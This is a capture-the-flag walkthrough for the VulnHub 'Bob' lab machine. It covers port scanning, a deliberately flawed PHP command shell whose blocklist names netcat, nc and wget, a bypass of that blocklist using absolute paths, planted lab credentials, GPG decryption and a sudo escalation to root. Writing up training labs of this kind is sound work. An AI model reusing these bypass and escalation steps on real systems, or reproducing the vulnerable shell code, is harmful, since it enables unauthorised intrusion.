you can download it here: https://www.vulnhub.com/entry/bob-101,226/

use nmap to do a thorough port scanning.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-11 04:29 EDT
Nmap scan report for 192.168.227.166
Host is up (0.00068s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
| 256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_ 256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (ED25519)
MAC Address: 00:0C:29:90:AF:5E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 192.168.227.166

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.27 seconds

check its http service(port 80), there is an interesting entry in robots.txt /dev_shell.php

1

ok, rce. after trying some commands, I found that some commands are filtered, like “ls”, and commands must not contain “;”

2

3

but “dir” is not filtered

3

seems like there is a backup file for the webshell, download and audit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
<html>
<body>
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !==false){
system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else{
$is_he_a_bad_man = explode(' ', trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)){
system("echo Get out skid lol");
}
else{
system($_POST['in_command']);
}
}
?>
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>

ok, “;” is filtered out, and the command will be split by space and check if any of “pwd”, “ls”, “netcat”, “ssh”, “wget”, “ping”, “traceroute”, “cat”, “nc” exists.

bypass would be easy, just use absolute path instead of relative path.

get a reverse shell:

5

walked around and gather some information

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
www-data@Milburg-High:/home/bob$ cat .old_passwordfile.html
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>

www-data@Milburg-High:/home/elliot$ cat theadminisdumb.txt
cat theadminisdumb.txt
The admin is dumb,
In fact everyone in the IT dept is pretty bad but I can’t blame all of them the newbies Sebastian and James are quite new to managing a server so I can forgive them for that password file they made on the server. But the admin now he’s quite something. Thinks he knows more than everyone else in the dept, he always yells at Sebastian and James now they do some dumb stuff but their new and this is just a high-school server who cares, the only people that would try and hack into this are script kiddies. His wallpaper policy also is redundant, why do we need custom wallpapers that doesn’t do anything. I have been suggesting time and time again to Bob ways we could improve the security since he “cares” about it so much but he just yells at me and says I don’t know what i’m doing. Sebastian has noticed and I gave him some tips on better securing his account, I can’t say the same for his friend James who doesn’t care and made his password: Qwerty. To be honest James isn’t the worst bob is his stupid web shell has issues and I keep telling him what he needs to patch but he doesn’t care about what I have to say. it’s only a matter of time before it’s broken into so because of this I have changed my password to

theadminisdumb

I hope bob is fired after the future second breach because of his incompetence. I almost want to fix it myself but at the same time it doesn’t affect me if they get breached, I get paid, he gets fired it’s a good time.

I have few credentials now:

jc:Qwerty

seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

elliot: theadminisdumb

but none of these account can do anything special. checked for suid file also got nothing. debian distribution is quite new, no exploit available.

found proftp 1.3.3c installation file in /home/bob/Downloads, it has a backdoor, but from nmap result, proftp is of version 1.3.5b, tried backdoor also failed.

found something suspicious in /home/bob/Documents

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
www-data@Milburg-High:/home/bob/Documents$ ls
ls
Secret login.txt.gpg staff.txt
www-data@Milburg-High:/home/bob/Documents$ cat staff.txt
cat staff.txt
Seb:

Seems to like Elliot
Wants to do well at his job
Gave me a backdoored FTP to instal that apparently Elliot gave him

James:

Does nothing
Pretty Lazy
Doesn't give a shit about his job

Elliot:

Keeps to himself
Always needs to challenge everything I do
Keep an eye on him
Try and get him fired
www-data@Milburg-High:/home/bob/Documents$ file login.txt.gpg
file login.txt.gpg
login.txt.gpg: GPG symmetrically encrypted data (AES cipher)
www-data@Milburg-High:/home/bob/Documents$ cd Secret
cd Secret
www-data@Milburg-High:/home/bob/Documents/Secret$ ls
ls
Keep_Out
www-data@Milburg-High:/home/bob/Documents/Secret$ cd K*
cd K*
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ ls
ls
Not_Porn Porn
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ cd No*
cd No*
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn$ ls
ls
No_Lookie_In_Here
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn$ cd N*
cd N*
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ ls
ls
notes.sh
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cat notes.sh
cat notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cd ..
cd ..
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn$ cd ..
cd ..
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ ls
ls
Not_Porn Porn
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ cd P*
cd P*
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Porn$ ls
ls
no_porn_4_u
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Porn$ cat n*
cat n*
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Porn$

notes.sh does not make any sense to me.

login.txt.gpg seems to contain login credential, but encrypted, try to decrypt, but failed after several tries of passphrase.

googled for walkthrough and found out that this is the passphrase:

6

1
2
3
4
5
6
jc@Milburg-High:/home/bob/Documents$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
<g --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_

use bob: b0bcat_ to login to bob’s account, and easily get root shell with sudo /bin/bash

7